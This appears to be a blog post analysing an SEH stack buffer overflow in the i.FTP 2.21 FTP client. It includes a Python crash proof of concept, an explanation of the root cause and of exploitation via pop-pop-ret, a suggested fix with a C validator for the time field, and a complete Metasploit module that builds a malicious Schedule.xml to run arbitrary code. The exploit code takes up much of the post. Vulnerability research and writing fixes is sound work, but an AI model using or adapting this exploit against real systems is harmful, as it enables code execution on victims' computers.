Yllen | Ring3.xyz


Going to see the top of the Eiffel Tower

Follow me on Weibo: t.cn/RGSLVUk

i.FTP 2.21 - SEH Overflow Crash PoC

# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing: 28th April 2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} > Time field

buffer = "A" * 600
buffer += "BBBB"  # Pointer to Next SEH Record
buffer += "CCCC"  # SEH HANDLER

file = "test.txt"
f = open(file, "w")
f.write(buffer)
f.close()







Trigger: click Schedule, choose Schedule download,
                 then paste the contents of test.txt into the Time field.

Root cause: the author did not account for the time value having to be in the fixed form xxxx-xx-xx xx:xx,
               so the user can freely control the data; this overflows the preallocated buffer and overwrites the
SEH structure above it on the stack, corrupting some data structures along the way, so an exception is thrown and program flow is hijacked.

Exploitation:
            600 bytes of padding + a (pop pop ret) address in the SEH handler;
            without DEP, the instruction that jumps to the shellcode can be written
            directly at NextSEH.

Impact:
             Triggering the vulnerability requires a great deal of user interaction, so its danger is small; it counts as a minor bug.

Fix:
            Use a control for time selection, and check external input for safety, e.g. check its length.
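The length and format check the fix section calls for, as an added example written for this page (not code from i.FTP, the PoC author or the module author): a validator that accepts only the exact xxxx-xx-xx xx:xx shape and rejects everything else, including a 600-byte value like the PoC's, before anything is copied into a fixed-size buffer. The names parse_schedule_time, schedule_time and bounded_len are assumptions.

```c
#include <ctype.h>
#include <string.h>

/* The fix section's rule: the Time field is exactly "xxxx-xx-xx xx:xx" (16 chars). */
#define SCHEDULE_TIME_LEN 16

struct schedule_time {            /* assumed type, not from i.FTP */
    int year, month, day, hour, minute;
    char text[SCHEDULE_TIME_LEN + 1]; /* fixed-size copy, written only after validation */
};

/* Bounded scan: never looks past `max` bytes, so a 600-byte value is rejected after
   17 comparisons instead of being copied into a fixed stack buffer. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Decimal value of the `n` digits starting at `off`; only called after the shape check. */
static int field(const char *s, size_t off, size_t n)
{
    int v = 0;
    for (size_t i = 0; i < n; i++) v = v * 10 + (s[off + i] - '0');
    return v;
}

/* Returns 1 and fills *out when `s` is exactly YYYY-MM-DD HH:MM with in-range fields,
   0 otherwise. Length and shape are checked before any byte is copied. */
int parse_schedule_time(const char *s, struct schedule_time *out)
{
    static const char shape[] = "dddd-dd-dd dd:dd";
    struct schedule_time t;
    if (s == NULL || bounded_len(s, SCHEDULE_TIME_LEN + 1) != SCHEDULE_TIME_LEN) return 0;
    for (size_t i = 0; i < SCHEDULE_TIME_LEN; i++) {
        int ok = (shape[i] == 'd') ? isdigit((unsigned char)s[i]) != 0 : s[i] == shape[i];
        if (!ok) return 0;
    }
    t.year = field(s, 0, 4);  t.month  = field(s, 5, 2);  t.day = field(s, 8, 2);
    t.hour = field(s, 11, 2); t.minute = field(s, 14, 2);
    if (t.month < 1 || t.month > 12 || t.day < 1 || t.day > 31) return 0; /* no per-month day count */
    if (t.hour > 23 || t.minute > 59) return 0;
    memcpy(t.text, s, SCHEDULE_TIME_LEN);
    t.text[SCHEDULE_TIME_LEN] = '\0';
    *out = t;
    return 1;
}
```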




EXP: 

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include REXML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'i-FTP Schedule Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        i-Ftp v2.20, caused by a long time value set for scheduled download.
        By persuading the victim to place a specially-crafted Schedule.xml file
        in the i-FTP folder, a remote attacker could execute arbitrary code on
        the system or cause the application to crash. This module has been
        tested successfully on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '35177' ],
          [ 'OSVDB', '114279' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d\x20\x22",
          'Space'      => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 600,
              'Ret'    => 0x1001eade  # POP ECX # POP ECX # RET [Lgi.dll]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 06 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml' ])
      ],
      self.class)
  end

  def exploit
    evil =  rand_text_alpha(target['Offset'])
    evil << generate_seh_payload(target.ret)
    evil << rand_text_alpha(20000)

    # Build the Schedule.xml document with a placeholder in the Time attribute
    xml = Document.new
    xml << XMLDecl.new('1.0', 'UTF-8')
    xml.add_element('Schedule', {})
    xml.elements[1].add_element(
      'Event',
      {
        'Url'    => '',
        'Time'   => 'EVIL',
        'Folder' => ''
      })

    # Serialise the document, then substitute the placeholder with the buffer
    sploit = ''
    xml.write(sploit, 2)
    sploit = sploit.gsub(/EVIL/, evil)

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end







© Yllen | Ring3.xyz | Powered by LOFTER